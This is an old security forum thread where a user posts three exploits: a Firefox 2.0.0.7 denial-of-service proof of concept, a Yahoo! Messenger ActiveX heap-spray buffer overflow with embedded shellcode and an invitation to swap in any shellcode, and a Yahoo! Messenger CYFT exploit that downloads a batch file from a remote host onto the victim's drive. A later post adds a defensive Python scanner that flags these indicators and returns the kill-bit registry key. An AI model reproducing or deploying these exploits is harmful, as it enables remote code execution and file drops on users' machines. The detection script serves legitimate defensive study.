puskin Posted April 19, 2008

###########################
# AmnPardaz Security Research & Penetration Testing Group
#
# Bug Title: Mozilla Firefox 2.0.0.7 Denial of Service
# Vendor URL: [url]www.mozilla.org[/url]
# Version: <= 2.0.0.7
# Fix Available: Yes!
# Solution: Update to 2.0.0.8
# Note: This bug works on 2.0.0.8 in a different way. Although this bug doesn't crash 2.0.0.8, it causes the HTML code not to be shown when viewing source in Mozilla Firefox 2.0.0.8, and this is another bug on 2.0.0.8!
# Proof: [url]http://www.astalavista.ir/proofs/MozillaFireFox/DoS1.htm[/url]
########################## [url]WwW.AmnPardaz.com[/url] ##########################
# Leaders: Shahin Ramezany & Sorush Dalili
# Team Members: Amir Hossein Khonakdar, Hamid Farhadi
# Security Site: [url]WwW.BugReport.ir[/url] - [url]WwW.AmnPardaz.Com[/url]
# Country: Iran
# Greetz To: Astalavista.ir (Secuiran.com) Security Research Group, GrayHatz.net
# Contacts: <th3_vampire {4-t] yahoo [d-0-t} com> & <Irsdl {4-t] yahoo [d-0-t} com>
#
######################## Bug Description #############################
# To do this work we need 2 files (HTML, XML).
# Their code is written below.
#
# Save the code below in an HTML file.
#----------------------------------------------------------------------------------------------------------------------------------------
[code]
<html>
 <head>
  <style>BODY{-moz-binding:url("moz.xml#xss")}</style>
 </head>
 <body>
  Suddenly see you baby! If you see this bug execution was failed!
  <script> alert('Soroush Dalili & Shahin Ramezani From Astalavista.ir') </script>
 </body>
</html>
[/code]
#----------------------------------------------------------------------------------------------------------------------------------------
#
# Save the code below in a "moz.xml" file.
#----------------------------------------------------------------------------------------------------------------------------------------
[code]
<?xml version="1.0"?>
<bindings xmlns="http://www.mozilla.org/xbl">
 <binding id="xss">
  <implementation>
   <constructor><![CDATA[
    eval(unescape('%64%6f%63%75%6d%65%6e%74%2e%77%72%69%74%65%28%27%3c%61%3e%27%29'));
   ]]></constructor>
  </implementation>
 </binding>
</bindings>
[/code]
#----------------------------------------------------------------------------------------------------------------------------------------
#
# Now, by running the HTML file in Mozilla Firefox <= 2.0.0.7 it will crash, and in Mozilla Firefox 2.0.0.8 no code will be shown when viewing the source.
####################################################################
puskin Posted April 19, 2008

Yahoo! Messenger ywcupl.dll ActiveX Control send() Remote Buffer Overflow Exploit

[code]
<html>
<!--
45 minutes of fuzzing! Great results! very reliable, runs calc.exe, replace with shellcode of your choice!!!
link: http://www.informationweek.com/news/showArticle.jhtml?articleID=199901856
maybe more vulz!
Greetz to: str0ke and shinnai!
-->
<html>
<object classid='clsid:DCE2F8B1-A520-11D4-8FD0-00D0B7730277' id='target'></object>
<script>
shellcode = unescape("%u9090%u9090%u9090%uC929%uE983%uD9DB%uD9EE%u2474" +
"%u5BF4%u7381%uA913%u4A67%u83CC%uFCEB%uF4E2%u8F55" +
"%uCC0C%u67A9%u89C1%uEC95%uC936%u66D1%u47A5%u7FE6" +
"%u93C1%u6689%u2FA1%u2E87%uF8C1%u6622%uFDA4%uFE69" +
"%u48E6%u1369%u0D4D%u6A63%u0E4B%u9342%u9871%u638D" +
"%u2F3F%u3822%uCD6E%u0142%uC0C1%uECE2%uD015%u8CA8" +
"%uD0C1%u6622%u45A1%u43F5%u0F4E%uA798%u472E%u57E9" +
"%u0CCF%u68D1%u8CC1%uECA5%uD03A%uEC04%uC422%u6C40" +
"%uCC4A%uECA9%uF80A%u1BAC%uCC4A%uECA9%uF022%u56F6" +
"%uACBC%u8CFF%uA447%uBFD7%uBFA8%uFFC1%u46B4%u30A7" +
"%u2BB5%u8941%u33B5%u0456%uA02B%u49CA%uB42F%u67CC" +
"%uCC4A%uD0FF");
bigblock = unescape("%u9090%u9090");
headersize = 20;
slackspace = headersize+shellcode.length;
while (bigblock.length<slackspace) bigblock+=bigblock;
fillblock = bigblock.substring(0, slackspace);
block = bigblock.substring(0, bigblock.length-slackspace);
while(block.length+slackspace<0x40000) block = block+block+fillblock;
memory = new Array();
for (x=0; x<800; x++) memory[x] = block + shellcode;
var buffer = '\x0a';
while (buffer.length < 5000) buffer+='\x0a\x0a\x0a\x0a';
target.server = buffer;
target.initialize();
target.send();
</script>
</html>
[/code]
puskin Posted April 19, 2008

Yahoo! Messenger 8.1.0.421 CYFT Object Arbitrary File Download

-----------------------------------------------------------------------------
[b]Yahoo! Messenger 8.1.0.421 CYFT Object (ft60.dll) Arbitrary File Download[/b]

url: [url]http://download.yahoo.com/dl/msgr8/us/ymsgr8us.exe[/url]

Author: shinnai
mail: shinnai[at]autistici[dot]org
site: [url]http://shinnai.altervista.org[/url]

[b]This was written for educational purpose. Use it at your own risk. Author will not be responsible for any damage.[/b]

Tested on Windows XP Professional SP2 all patched, with Internet Explorer 7

[b]Marked as:
RegKey Safe for Script: False
RegkeySafe for Init: False
KillBitSet: False[/b]

From remote: depends on Internet Explorer settings
From local: yes

[b]Description:
This control contains a "GetFile()" method which allows downloading, on the user's pc, an arbitrary file passed as argument.
Remote execution depends on Internet Explorer settings, local execution works very well.[/b]

[b]greetz to: skyhole (or YAG KOHHA) for inspiration[/b]
-----------------------------------------------------------------------------

[code]
<object classid='clsid:24F3EAD6-8B87-4C1A-97DA-71C126BDA08F' id='test'></object>
<input language=VBScript onclick=tryMe() type=button value='Click here to start the test'>
<script language='vbscript'>
 Sub tryMe
  test.GetFile "http://www.shinnai.altervista.org/shinnai.bat","c:\\shinnai.bat",5,1,"shinnai"
  MsgBox "Exploit completed"
 End Sub
</script>
[/code]
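The three posts above share a handful of static indicators a defender can triage captured pages for: a CSS `-moz-binding:url(...)` that pulls in an XBL binding (the Firefox DoS), an `eval(unescape('%XX...'))` wrapper hiding the binding's constructor script, `<object classid='clsid:...'>` tags instantiating the two Yahoo! Messenger controls, the repeated `%u9090` words of the heap-spray idiom, and inline VBScript handlers. The script below is an added example written for this thread; it is not code from puskin, AmnPardaz or shinnai. It assumes a small blocklist built only from the two CLSIDs quoted in the posts, uses constructed sample fragments in which the shellcode is truncated to its first word and the download URL is a placeholder, and returns, for a blocklisted CLSID, the standard Internet Explorer kill-bit location (`Compatibility Flags = 0x400` under `ActiveX Compatibility\{CLSID}`), which is the per-control mitigation the advisory's "KillBitSet: False" line refers to.

```python
"""Static triage of HTML/XBL pages for the indicators seen in this thread (added example)."""
import re
from urllib.parse import unquote

# Assumption: blocklist built from the two ActiveX advisories posted above.
KNOWN_BAD_CLSIDS = {
    "DCE2F8B1-A520-11D4-8FD0-00D0B7730277": "Yahoo! Messenger ywcupl.dll, send() buffer overflow",
    "24F3EAD6-8B87-4C1A-97DA-71C126BDA08F": "Yahoo! Messenger CYFT ft60.dll, GetFile() arbitrary download",
}

MOZ_BINDING_RE = re.compile(r"-moz-binding\s*:\s*url\(\s*['\"]?([^'\")]+)", re.I)
EVAL_UNESCAPE_RE = re.compile(
    r"eval\s*\(\s*unescape\s*\(\s*['\"]((?:%[0-9a-f]{2})+)['\"]\s*\)\s*\)", re.I)
OBJECT_CLSID_RE = re.compile(r"<object[^>]*classid\s*=\s*['\"]?clsid:([0-9a-f-]{36})", re.I)
VBSCRIPT_RE = re.compile(r"language\s*=\s*['\"]?vbscript", re.I)
NOP_SLED_MIN = 3  # %u9090 repeated: the x86 NOP words of the heap-spray idiom in the ywcupl.dll post


def decode_eval_unescape(js):
    """Plaintext of every eval(unescape('%XX...')) call in js; unquote() undoes the %XX escapes."""
    return [unquote(m.group(1)) for m in EVAL_UNESCAPE_RE.finditer(js)]


def kill_bit(clsid):
    """Registry location Internet Explorer checks before instantiating a control:
    the 'kill bit' is Compatibility Flags = 0x400 under ActiveX Compatibility\\{CLSID}."""
    key = r"HKLM\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\{%s}" % clsid.upper()
    return key, "Compatibility Flags", 0x400


def scan(html):
    """Return (kind, detail) indicators found in an HTML or XBL document, in a fixed order."""
    findings = []
    for m in MOZ_BINDING_RE.finditer(html):
        findings.append(("moz-binding", m.group(1)))          # CSS pulling in an XBL binding
    for payload in decode_eval_unescape(html):
        findings.append(("eval-unescape", payload))           # obfuscated script, decoded
    for m in OBJECT_CLSID_RE.finditer(html):
        clsid = m.group(1).upper()
        findings.append(("activex", f"{clsid}: {KNOWN_BAD_CLSIDS.get(clsid, 'not on blocklist')}"))
    sled = html.lower().count("%u9090")
    if sled >= NOP_SLED_MIN:
        findings.append(("nop-sled", f"%u9090 x{sled}"))
    if VBSCRIPT_RE.search(html):
        findings.append(("vbscript", "inline VBScript handler"))
    return findings


# Constructed sample inputs modelled on the three posts (shellcode truncated, placeholder URL).
SAMPLE_FIREFOX = '<html><head><style>BODY{-moz-binding:url("moz.xml#xss")}</style></head><body></body></html>'
SAMPLE_XBL = """<bindings xmlns="http://www.mozilla.org/xbl"><binding id="xss"><implementation>
<constructor><![CDATA[ eval(unescape('%64%6f%63%75%6d%65%6e%74%2e%77%72%69%74%65%28%27%3c%61%3e%27%29')); ]]></constructor>
</implementation></binding></bindings>"""
SAMPLE_YAHOO = """<object classid='clsid:DCE2F8B1-A520-11D4-8FD0-00D0B7730277' id='target'></object>
<script>shellcode = unescape("%u9090%u9090%u9090%uC929" + "...");
bigblock = unescape("%u9090%u9090"); target.server = buffer; target.send();</script>"""
SAMPLE_CYFT = """<object classid='clsid:24F3EAD6-8B87-4C1A-97DA-71C126BDA08F' id='test'></object>
<script language='vbscript'> Sub tryMe
 test.GetFile "http://example.invalid/x.bat","c:\\x.bat",5,1,"x"
End Sub</script>"""

if __name__ == "__main__":
    for name, doc in [("firefox", SAMPLE_FIREFOX), ("xbl", SAMPLE_XBL),
                      ("yahoo", SAMPLE_YAHOO), ("cyft", SAMPLE_CYFT)]:
        print(name, scan(doc))
    print(kill_bit("24F3EAD6-8B87-4C1A-97DA-71C126BDA08F"))
```

Decoding rather than merely flagging the `eval(unescape(...))` wrapper matters: here it unpacks to nothing more than `document.write('<a>')`, which is exactly the write-during-binding-construction that the AmnPardaz advisory says crashes Firefox 2.0.0.7, so the analyst sees the trigger instead of an opaque blob. For the two ActiveX posts the durable fix is the vendor update; the kill-bit value returned by `kill_bit()` is the browser-side control that stops Internet Explorer from instantiating the CLSID regardless of page content.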
Vhaerun Posted April 19, 2008

I guess I'd spoil all your fun if I told you to edit your post every time you want to add something here, wouldn't I?

edit: replace the word "fun" with "progress towards V.I.P" (or RIP)
puskin Posted April 19, 2008

[quote]I guess I'd spoil all your fun if I told you to edit your post every time you want to add something here, wouldn't I?

edit: replace the word "fun" with "progress towards V.I.P" (or RIP)[/quote]

sorry man.... I got a bit carried away.. next time I won't make a racket, all the best!
Guest Kenpachi Posted April 19, 2008

When it's useful stuff, double, triple or X-ple posting doesn't bother me.